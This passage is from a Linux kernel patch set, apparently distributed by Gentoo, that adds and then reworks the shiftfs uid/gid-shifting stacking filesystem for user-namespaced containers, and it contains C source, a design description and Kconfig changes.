++#include <linux/file.h>
++#include <linux/fs.h>
++#include <linux/namei.h>
++#include <linux/module.h>
++#include <linux/kernel.h>
++#include <linux/magic.h>
++#include <linux/parser.h>
++#include <linux/seq_file.h>
++#include <linux/statfs.h>
++#include <linux/slab.h>
++#include <linux/user_namespace.h>
++#include <linux/uidgid.h>
++#include <linux/xattr.h>
++
++struct shiftfs_super_info {
++	struct vfsmount *mnt;
++	struct user_namespace *userns;
++	bool mark;
++};
++
++static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
++				       struct dentry *dentry);
++
++enum {
++	OPT_MARK,
++	OPT_LAST,
++};
++
++/* global filesystem options */
++static const match_table_t tokens = {
++	{ OPT_MARK, "mark" },
++	{ OPT_LAST, NULL }
++};
++
++static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
++{
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct cred *cred = prepare_creds();
++
++	if (!cred)
++		return NULL;
++
++	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
++	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
++	put_user_ns(cred->user_ns);
++	cred->user_ns = get_user_ns(ssi->userns);
++
++	return cred;
++}
++
++static const struct cred *shiftfs_new_creds(const struct cred **newcred,
++					    struct super_block *sb)
++{
++	const struct cred *cred = shiftfs_get_up_creds(sb);
++
++	*newcred = cred;
++
++	if (cred)
++		cred = override_creds(cred);
++	else
++		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
++
++	return cred;
++}
++
++static void shiftfs_old_creds(const struct cred *oldcred,
++			      const struct cred **newcred)
++{
++	if (!*newcred)
++		return;
++
++	revert_creds(oldcred);
++	put_cred(*newcred);
++}
++
++static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
++{
++	char *p;
++	substring_t args[MAX_OPT_ARGS];
++
++	ssi->mark = false;
++
++	while ((p = strsep(&options, ",")) != NULL) {
++		int token;
++
++		if (!*p)
++			continue;
++
++		token = match_token(p, tokens, args);
++		switch (token) {
++		case OPT_MARK:
++			ssi->mark = true;
++			break;
++		default:
++			return -EINVAL;
++		}
++	}
++	return 0;
++}
++
++static void shiftfs_d_release(struct dentry *dentry)
++{
++	struct dentry *real = dentry->d_fsdata;
++
++	dput(real);
++}
++
++static struct dentry *shiftfs_d_real(struct dentry *dentry,
++				     const struct inode *inode)
++{
++	struct dentry *real = dentry->d_fsdata;
++
++	if (unlikely(real->d_flags & DCACHE_OP_REAL))
++		return real->d_op->d_real(real, real->d_inode);
++
++	return real;
++}
++
++static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++
++	if (d_unhashed(real))
++		return 0;
++
++	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
++		return 1;
++
++	return real->d_op->d_weak_revalidate(real, flags);
++}
++
++static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int ret;
++
++	if (d_unhashed(real))
++		return 0;
++
++	/*
++	 * inode state of underlying changed from positive to negative
++	 * or vice versa; force a lookup to update our view
++	 */
++	if (d_is_negative(real) != d_is_negative(dentry))
++		return 0;
++
++	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
++		return 1;
++
++	ret = real->d_op->d_revalidate(real, flags);
++
++	if (ret == 0 && !(flags & LOOKUP_RCU))
++		d_invalidate(real);
++
++	return ret;
++}
++
++static const struct dentry_operations shiftfs_dentry_ops = {
++	.d_release	= shiftfs_d_release,
++	.d_real		= shiftfs_d_real,
++	.d_revalidate	= shiftfs_d_revalidate,
++	.d_weak_revalidate = shiftfs_d_weak_revalidate,
++};
++
++static int shiftfs_readlink(struct dentry *dentry, char __user *data,
++			    int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++	const struct inode_operations *iop = real->d_inode->i_op;
++
++	if (iop->readlink)
++		return iop->readlink(real, data, flags);
++
++	return -EINVAL;
++}
++
++static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
++				    struct delayed_call *done)
++{
++	if (dentry) {
++		struct dentry *real = dentry->d_fsdata;
++		struct inode *reali = real->d_inode;
++		const struct inode_operations *iop = reali->i_op;
++		const char *res = ERR_PTR(-EPERM);
++
++		if (iop->get_link)
++			res = iop->get_link(real, reali, done);
++
++		return res;
++	} else {
++		/* RCU lookup not supported */
++		return ERR_PTR(-ECHILD);
++	}
++}
++
++static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
++			    const char *name, const void *value,
++			    size_t size, int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err = -EOPNOTSUPP;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_setxattr(real, name, value, size, flags);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_xattr_get(const struct xattr_handler *handler,
++			     struct dentry *dentry, struct inode *inode,
++			     const char *name, void *value, size_t size)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_getxattr(real, name, value, size);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
++				 size_t size)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_listxattr(real, list, size);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_removexattr(struct dentry *dentry, const char *name)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_removexattr(real, name);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_xattr_set(const struct xattr_handler *handler,
++			     struct dentry *dentry, struct inode *inode,
++			     const char *name, const void *value, size_t size,
++			     int flags)
++{
++	if (!value)
++		return shiftfs_removexattr(dentry, name);
++	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
++}
++
++static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
++{
++	struct inode *reali;
++
++	if (!dentry)
++		return;
++
++	reali = dentry->d_inode;
++
++	if (!reali->i_op->get_link)
++		inode->i_opflags |= IOP_NOFOLLOW;
++
++	inode->i_mapping = reali->i_mapping;
++	inode->i_private = dentry;
++}
++
++static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
++			       umode_t mode, const char *symlink,
++			       struct dentry *hardlink, bool excl)
++{
++	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
++	struct inode *reali = real->d_inode, *newi;
++	const struct inode_operations *iop = reali->i_op;
++	int err;
++	const struct cred *oldcred, *newcred;
++	bool op_ok = false;
++
++	if (hardlink) {
++		op_ok = iop->link;
++	} else {
++		switch (mode & S_IFMT) {
++		case S_IFDIR:
++			op_ok = iop->mkdir;
++			break;
++		case S_IFREG:
++			op_ok = iop->create;
++			break;
++		case S_IFLNK:
++			op_ok = iop->symlink;
++		}
++	}
++	if (!op_ok)
++		return -EINVAL;
++
++
++	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
++	if (!newi)
++		return -ENOMEM;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++
++	inode_lock_nested(reali, I_MUTEX_PARENT);
++
++	err = -EINVAL;		/* shut gcc up about uninit var */
++	if (hardlink) {
++		struct dentry *realhardlink = hardlink->d_fsdata;
++
++		err = vfs_link(realhardlink, reali, new, NULL);
++	} else {
++		switch (mode & S_IFMT) {
++		case S_IFDIR:
++			err = vfs_mkdir(reali, new, mode);
++			break;
++		case S_IFREG:
++			err = vfs_create(reali, new, mode, excl);
++			break;
++		case S_IFLNK:
++			err = vfs_symlink(reali, new, symlink);
++		}
++	}
++
++	shiftfs_old_creds(oldcred, &newcred);
++
++	if (err)
++		goto out_dput;
++
++	shiftfs_fill_inode(newi, new);
++
++	d_instantiate(dentry, newi);
++
++	new = NULL;
++	newi = NULL;
++
++ out_dput:
++	dput(new);
++	iput(newi);
++	inode_unlock(reali);
++
++	return err;
++}
++
++static int shiftfs_create(struct inode *dir, struct dentry *dentry,
++			  umode_t mode,  bool excl)
++{
++	mode |= S_IFREG;
++
++	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
++}
++
++static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
++			 umode_t mode)
++{
++	mode |= S_IFDIR;
++
++	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
++}
++
++static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
++			struct dentry *dentry)
++{
++	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
++}
++
++static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
++			   const char *symlink)
++{
++	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++}
++
++static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
++{
++	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
++	struct inode *reali = real->d_inode;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	inode_lock_nested(reali, I_MUTEX_PARENT);
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++
++	if (rmdir)
++		err = vfs_rmdir(reali, new);
++	else
++		err = vfs_unlink(reali, new, NULL);
++
++	shiftfs_old_creds(oldcred, &newcred);
++	inode_unlock(reali);
++
++	return err;
++}
++
++static int shiftfs_unlink(struct inode *dir, struct dentry *dentry)
++{
++	return shiftfs_rm(dir, dentry, false);
++}
++
++static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
++{
++	return shiftfs_rm(dir, dentry, true);
++}
++
++static int shiftfs_rename(struct inode *olddir, struct dentry *old,
++			  struct inode *newdir, struct dentry *new,
++			  unsigned int flags)
++{
++	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
++		*realold = old->d_fsdata,
++		*realnew = new->d_fsdata, *trap;
++	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
++	int err = -EINVAL;
++	const struct cred *oldcred, *newcred;
++
++	trap = lock_rename(rndd, rodd);
++
++	if (trap == realold || trap == realnew)
++		goto out_unlock;
++
++	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
++
++	err = vfs_rename(realolddir, realold, realnewdir,
++			 realnew, NULL, flags);
++
++	shiftfs_old_creds(oldcred, &newcred);
++
++ out_unlock:
++	unlock_rename(rndd, rodd);
++
++	return err;
++}
++
++static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
++				     unsigned int flags)
++{
++	struct dentry *real = dir->i_private, *new;
++	struct inode *reali = real->d_inode, *newi;
++	const struct cred *oldcred, *newcred;
++
++	inode_lock(reali);
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
++	shiftfs_old_creds(oldcred, &newcred);
++	inode_unlock(reali);
++
++	if (IS_ERR(new))
++		return new;
++
++	dentry->d_fsdata = new;
++
++	newi = NULL;
++	if (!new->d_inode)
++		goto out;
++
++	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
++	if (!newi) {
++		dput(new);
++		return ERR_PTR(-ENOMEM);
++	}
++
++ out:
++	return d_splice_alias(newi, dentry);
++}
++
++static int shiftfs_permission(struct inode *inode, int mask)
++{
++	struct dentry *real = inode->i_private;
++	struct inode *reali = real->d_inode;
++	const struct inode_operations *iop = reali->i_op;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	if (mask & MAY_NOT_BLOCK)
++		return -ECHILD;
++
++	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
++	if (iop->permission)
++		err = iop->permission(reali, mask);
++	else
++		err = generic_permission(reali, mask);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
++{
++	struct dentry *real = dentry->d_fsdata;
++	struct inode *reali = real->d_inode;
++	const struct inode_operations *iop = reali->i_op;
++	struct iattr newattr = *attr;
++	const struct cred *oldcred, *newcred;
++	struct super_block *sb = dentry->d_sb;
++	int err;
++
++	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
++	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	inode_lock(reali);
++	if (iop->setattr)
++		err = iop->setattr(real, &newattr);
++	else
++		err = simple_setattr(real, &newattr);
++	inode_unlock(reali);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	if (err)
++		return err;
++
++	/* all OK, reflect the change on our inode */
++	setattr_copy(d_inode(dentry), attr);
++	return 0;
++}
++
++static int shiftfs_getattr(const struct path *path, struct kstat *stat,
++			   u32 request_mask, unsigned int query_flags)
++{
++	struct inode *inode = path->dentry->d_inode;
++	struct dentry *real = path->dentry->d_fsdata;
++	struct inode *reali = real->d_inode;
++	const struct inode_operations *iop = reali->i_op;
++	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
++	int err = 0;
++
++	if (iop->getattr)
++		err = iop->getattr(&newpath, stat, request_mask, query_flags);
++	else
++		generic_fillattr(reali, stat);
++
++	if (err)
++		return err;
++
++	/* transform the underlying id */
++	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
++	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
++	return 0;
++}
++
++static const struct inode_operations shiftfs_inode_ops = {
++	.lookup		= shiftfs_lookup,
++	.getattr	= shiftfs_getattr,
++	.setattr	= shiftfs_setattr,
++	.permission	= shiftfs_permission,
++	.mkdir		= shiftfs_mkdir,
++	.symlink	= shiftfs_symlink,
++	.get_link	= shiftfs_get_link,
++	.readlink	= shiftfs_readlink,
++	.unlink		= shiftfs_unlink,
++	.rmdir		= shiftfs_rmdir,
++	.rename		= shiftfs_rename,
++	.link		= shiftfs_link,
++	.create		= shiftfs_create,
++	.mknod		= NULL,	/* no special files currently */
++	.listxattr	= shiftfs_listxattr,
++};
++
++static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
++				       struct dentry *dentry)
++{
++	struct inode *inode;
++
++	inode = new_inode(sb);
++	if (!inode)
++		return NULL;
++
++	/*
++	 * our inode is completely vestigial.  All lookups, getattr
++	 * and permission checks are done on the underlying inode, so
++	 * what the user sees is entirely from the underlying inode.
++	 */
++	mode &= S_IFMT;
++
++	inode->i_ino = get_next_ino();
++	inode->i_mode = mode;
++	inode->i_flags |= S_NOATIME | S_NOCMTIME;
++
++	inode->i_op = &shiftfs_inode_ops;
++
++	shiftfs_fill_inode(inode, dentry);
++
++	return inode;
++}
++
++static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++
++	if (ssi->mark)
++		seq_show_option(m, "mark", NULL);
++
++	return 0;
++}
++
++static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct dentry *root = sb->s_root;
++	struct dentry *realroot = root->d_fsdata;
++	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
++	int err;
++
++	err = vfs_statfs(&realpath, buf);
++	if (err)
++		return err;
++
++	buf->f_type = sb->s_magic;
++
++	return 0;
++}
++
++static void shiftfs_put_super(struct super_block *sb)
++{
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++
++	mntput(ssi->mnt);
++	put_user_ns(ssi->userns);
++	kfree(ssi);
++}
++
++static const struct xattr_handler shiftfs_xattr_handler = {
++	.prefix = "",
++	.get    = shiftfs_xattr_get,
++	.set    = shiftfs_xattr_set,
++};
++
++const struct xattr_handler *shiftfs_xattr_handlers[] = {
++	&shiftfs_xattr_handler,
++	NULL
++};
++
++static const struct super_operations shiftfs_super_ops = {
++	.put_super	= shiftfs_put_super,
++	.show_options	= shiftfs_show_options,
++	.statfs		= shiftfs_statfs,
++};
++
++struct shiftfs_data {
++	void *data;
++	const char *path;
++};
++
++static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
++			      int silent)
++{
++	struct shiftfs_data *data = raw_data;
++	char *name = kstrdup(data->path, GFP_KERNEL);
++	int err = -ENOMEM;
++	struct shiftfs_super_info *ssi = NULL;
++	struct path path;
++	struct dentry *dentry;
++
++	if (!name)
++		goto out;
++
++	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
++	if (!ssi)
++		goto out;
++
++	err = -EPERM;
++	err = shiftfs_parse_options(ssi, data->data);
++	if (err)
++		goto out;
++
++	/* to mark a mount point, must be real root */
++	if (ssi->mark && !capable(CAP_SYS_ADMIN))
++		goto out;
++
++	/* else to mount a mark, must be userns admin */
++	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
++		goto out;
++
++	err = kern_path(name, LOOKUP_FOLLOW, &path);
++	if (err)
++		goto out;
++
++	err = -EPERM;
++
++	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
++		err = -ENOTDIR;
++		goto out_put;
++	}
++
++	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
++	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
++		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
++		err = -EINVAL;
++		goto out_put;
++	}
++
++	if (ssi->mark) {
++		/*
++		 * this part is visible unshifted, so make sure no
++		 * executables that could be used to give suid
++		 * privileges
++		 */
++		sb->s_iflags = SB_I_NOEXEC;
++		ssi->mnt = path.mnt;
++		dentry = path.dentry;
++	} else {
++		struct shiftfs_super_info *mp_ssi;
++
++		/*
++		 * this leg executes if we're admin capable in
++		 * the namespace, so be very careful
++		 */
++		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
++			goto out_put;
++		mp_ssi = path.dentry->d_sb->s_fs_info;
++		if (!mp_ssi->mark)
++			goto out_put;
++		ssi->mnt = mntget(mp_ssi->mnt);
++		dentry = dget(path.dentry->d_fsdata);
++		path_put(&path);
++	}
++	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
++	sb->s_fs_info = ssi;
++	sb->s_magic = SHIFTFS_MAGIC;
++	sb->s_op = &shiftfs_super_ops;
++	sb->s_xattr = shiftfs_xattr_handlers;
++	sb->s_d_op = &shiftfs_dentry_ops;
++	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
++	sb->s_root->d_fsdata = dentry;
++
++	return 0;
++
++ out_put:
++	path_put(&path);
++ out:
++	kfree(name);
++	kfree(ssi);
++	return err;
++}
++
++static struct dentry *shiftfs_mount(struct file_system_type *fs_type,
++				    int flags, const char *dev_name, void *data)
++{
++	struct shiftfs_data d = { data, dev_name };
++
++	return mount_nodev(fs_type, flags, &d, shiftfs_fill_super);
++}
++
++static struct file_system_type shiftfs_type = {
++	.owner		= THIS_MODULE,
++	.name		= "shiftfs",
++	.mount		= shiftfs_mount,
++	.kill_sb	= kill_anon_super,
++	.fs_flags	= FS_USERNS_MOUNT,
++};
++
++static int __init shiftfs_init(void)
++{
++	return register_filesystem(&shiftfs_type);
++}
++
++static void __exit shiftfs_exit(void)
++{
++	unregister_filesystem(&shiftfs_type);
++}
++
++MODULE_ALIAS_FS("shiftfs");
++MODULE_AUTHOR("James Bottomley");
++MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
++MODULE_LICENSE("GPL v2");
++module_init(shiftfs_init)
++module_exit(shiftfs_exit)
+diff --git a/include/uapi/linux/magic.h b/include/uapi/linux/magic.h
+index 6325d1d0e90f..1f70efb41565 100644
+--- a/include/uapi/linux/magic.h
++++ b/include/uapi/linux/magic.h
+@@ -102,4 +102,6 @@
+ #define DEVMEM_MAGIC		0x454d444d	/* "DMEM" */
+ #define SECRETMEM_MAGIC		0x5345434d	/* "SECM" */
+ 
++#define SHIFTFS_MAGIC		0x6a656a62
++
+ #endif /* __LINUX_MAGIC_H__ */
+-- 
+2.39.2
+
+From 7b502b7e97db8ec9deff14f434eed2f2fbc0cd2f Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Thu, 4 Apr 2019 15:39:12 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework and extend
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
+
+/* Introduction */
+The shiftfs filesystem is implemented as a stacking filesystem. Since it is
+a stacking filesystem it shares concepts with overlayfs and ecryptfs.
+Usually, shiftfs will be stacked upon another filesystem. The filesystem on
+top - shiftfs - is referred to as "upper filesystem" or "overlay" and the
+filesystem it is stacked upon is referred to as "lower filesystem" or
+"underlay".
+
+/* Marked and Unmarked shiftfs mounts */
+To use shiftfs it is necessary that a given mount is marked as shiftable via
+the "mark" mount option. Any mount of shiftfs without the "mark" mount option
+not on top of a shiftfs mount with the "mark" mount option will be refused with
+EPERM.
+After a marked shiftfs mount has been performed other shiftfs mounts
+referencing the marked shiftfs mount can be created. These secondary shiftfs
+mounts are usually what are of interest.
+The marked shiftfs mount will take a reference to the underlying mountpoint of
+the directory it is marking as shiftable. Any unmarked shiftfts mounts
+referencing this marked shifts mount will take a second reference to this
+directory as well. This ensures that the underlying marked shiftfs mount can be
+unmounted thereby dropping the reference to the underlying directory without
+invalidating the mountpoint of said directory since the non-marked shiftfs
+mount still holds another reference to it.
+
+/* Stacking Depth */
+Shiftfs tries to keep the stack as flat as possible to avoid hitting the
+kernel enforced filesystem stacking limit.
+
+/* Permission Model */
+When the mark shiftfs mount is created shiftfs will record the credentials of
+the creator of the super block and stash it in the super block. When other
+non-mark shiftfs mounts are created that reference the mark shiftfs mount they
+will stash another reference to the creators credentials. Before calling into
+the underlying filesystem shiftfs will switch to the creators credentials and
+revert to the original credentials after the underlying filesystem operation
+returns.
+
+/* Mount Options */
+- mark
+  When set the mark mount option indicates that the mount in question is
+  allowed to be shifted. Since shiftfs it mountable in by user namespace root
+  non-initial user namespace this mount options ensures that the system
+  administrator has decided that the marked mount is safe to be shifted.
+  To mark a mount as shiftable CAP_SYS_ADMIN in the user namespace is required.
+- passthrough={0,1,2,3}
+  This mount options functions as a bitmask. When set to a non-zero value
+  shiftfs will try to act as an invisible shim sitting on top of the
+  underlying filesystem.
+  - 1: Shifts will report the filesystem type of the underlay for stat-like
+       system calls.
+  - 2: Shiftfs will passthrough whitelisted ioctl() to the underlay.
+  - 3: Shiftfs will both use 1 and 2.
+Note that mount options on a marked mount cannot be changed.
+
+/* Extended Attributes */
+Shiftfs will make sure to translate extended attributes.
+
+/* Inodes Numbers */
+Shiftfs inodes numbers are copied up from the underlying filesystem, i.e.
+shiftfs inode numbers will be identical to the corresponding underlying
+filesystem's inode numbers. This has the advantage that inotify and friends
+should work out of the box.
+(In essence, shiftfs is nothing but a 1:1 mirror of the underlying filesystem's
+ dentries and inodes.)
+
+/* Device Support */
+Shiftfs only supports the creation of pipe and socket devices. Character and
+block devices cannot be created through shiftfs.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/Kconfig   |   10 +
+ fs/shiftfs.c | 1852 ++++++++++++++++++++++++++++++++++++++++----------
+ 2 files changed, 1493 insertions(+), 369 deletions(-)
+
+diff --git a/fs/Kconfig b/fs/Kconfig
+index b53bece1e940..ada9a1234e72 100644
+--- a/fs/Kconfig
++++ b/fs/Kconfig
+@@ -136,6 +136,16 @@ config SHIFT_FS
+ 	  unprivileged containers can use this to mount root volumes
+ 	  using this technique.
+ 
++config SHIFT_FS_POSIX_ACL
++	bool "shiftfs POSIX Access Control Lists"
++	depends on SHIFT_FS
++	select FS_POSIX_ACL
++	help
++	  POSIX Access Control Lists (ACLs) support permissions for users and
++	  groups beyond the owner/group/world scheme.
++
++	  If you don't know what Access Control Lists are, say N.
++
+ menu "Caches"
+ 
+ source "fs/netfs/Kconfig"
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index f7cada126daa..ad1ae5bce6c1 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1,3 +1,4 @@
++#include <linux/capability.h>
+ #include <linux/cred.h>
+ #include <linux/mount.h>
+ #include <linux/file.h>
+@@ -7,83 +8,179 @@
+ #include <linux/kernel.h>
+ #include <linux/magic.h>
+ #include <linux/parser.h>
++#include <linux/security.h>
+ #include <linux/seq_file.h>
+ #include <linux/statfs.h>
+ #include <linux/slab.h>
+ #include <linux/user_namespace.h>
+ #include <linux/uidgid.h>
+ #include <linux/xattr.h>
++#include <linux/posix_acl.h>
++#include <linux/posix_acl_xattr.h>
++#include <linux/uio.h>
+ 
+ struct shiftfs_super_info {
+ 	struct vfsmount *mnt;
+ 	struct user_namespace *userns;
++	/* creds of process who created the super block */
++	const struct cred *creator_cred;
+ 	bool mark;
++	unsigned int passthrough;
++	struct shiftfs_super_info *info_mark;
+ };
+ 
+-static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
+-				       struct dentry *dentry);
++struct shiftfs_file_info {
++	struct path realpath;
++	struct file *realfile;
++};
++
++struct kmem_cache *shiftfs_file_info_cache;
++
++static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
++			       umode_t mode, dev_t dev, struct dentry *dentry);
++
++#define SHIFTFS_PASSTHROUGH_NONE 0
++#define SHIFTFS_PASSTHROUGH_STAT 1
++#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
++
++static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
++{
++	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
++		return false;
++
++	if (info->info_mark &&
++	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
++		return false;
++
++	return true;
++}
+ 
+ enum {
+ 	OPT_MARK,
++	OPT_PASSTHROUGH,
+ 	OPT_LAST,
+ };
+ 
+ /* global filesystem options */
+ static const match_table_t tokens = {
+ 	{ OPT_MARK, "mark" },
++	{ OPT_PASSTHROUGH, "passthrough=%u" },
+ 	{ OPT_LAST, NULL }
+ };
+ 
+-static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
++static const struct cred *shiftfs_override_creds(const struct super_block *sb)
+ {
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
+-	struct cred *cred = prepare_creds();
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 
+-	if (!cred)
+-		return NULL;
++	return override_creds(sbinfo->creator_cred);
++}
++
++static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
++					       struct cred *newcred)
++{
++	revert_creds(oldcred);
++	put_cred(newcred);
++}
++
++static int shiftfs_override_object_creds(const struct super_block *sb,
++					 const struct cred **oldcred,
++					 struct cred **newcred,
++					 struct dentry *dentry, umode_t mode,
++					 bool hardlink)
++{
++	kuid_t fsuid = current_fsuid();
++	kgid_t fsgid = current_fsgid();
++
++	*oldcred = shiftfs_override_creds(sb);
++
++	*newcred = prepare_creds();
++	if (!*newcred) {
++		revert_creds(*oldcred);
++		return -ENOMEM;
++	}
++
++	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
++	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++
++	if (!hardlink) {
++		int err = security_dentry_create_files_as(dentry, mode,
++							  &dentry->d_name,
++							  *oldcred, *newcred);
++		if (err) {
++			shiftfs_revert_object_creds(*oldcred, *newcred);
++			return err;
++		}
++	}
+ 
+-	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
+-	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
+-	put_user_ns(cred->user_ns);
+-	cred->user_ns = get_user_ns(ssi->userns);
++	put_cred(override_creds(*newcred));
++	return 0;
++}
+ 
+-	return cred;
++static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
++			 kuid_t kuid)
++{
++	uid_t uid = from_kuid(from, kuid);
++	return make_kuid(to, uid);
+ }
+ 
+-static const struct cred *shiftfs_new_creds(const struct cred **newcred,
+-					    struct super_block *sb)
++static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
++			 kgid_t kgid)
+ {
+-	const struct cred *cred = shiftfs_get_up_creds(sb);
++	gid_t gid = from_kgid(from, kgid);
++	return make_kgid(to, gid);
++}
+ 
+-	*newcred = cred;
++static void shiftfs_copyattr(struct inode *from, struct inode *to)
++{
++	struct user_namespace *from_ns = from->i_sb->s_user_ns;
++	struct user_namespace *to_ns = to->i_sb->s_user_ns;
++
++	to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid);
++	to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid);
++	to->i_mode = from->i_mode;
++	to->i_atime = from->i_atime;
++	to->i_mtime = from->i_mtime;
++	to->i_ctime = from->i_ctime;
++	i_size_write(to, i_size_read(from));
++}
+ 
+-	if (cred)
+-		cred = override_creds(cred);
+-	else
+-		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
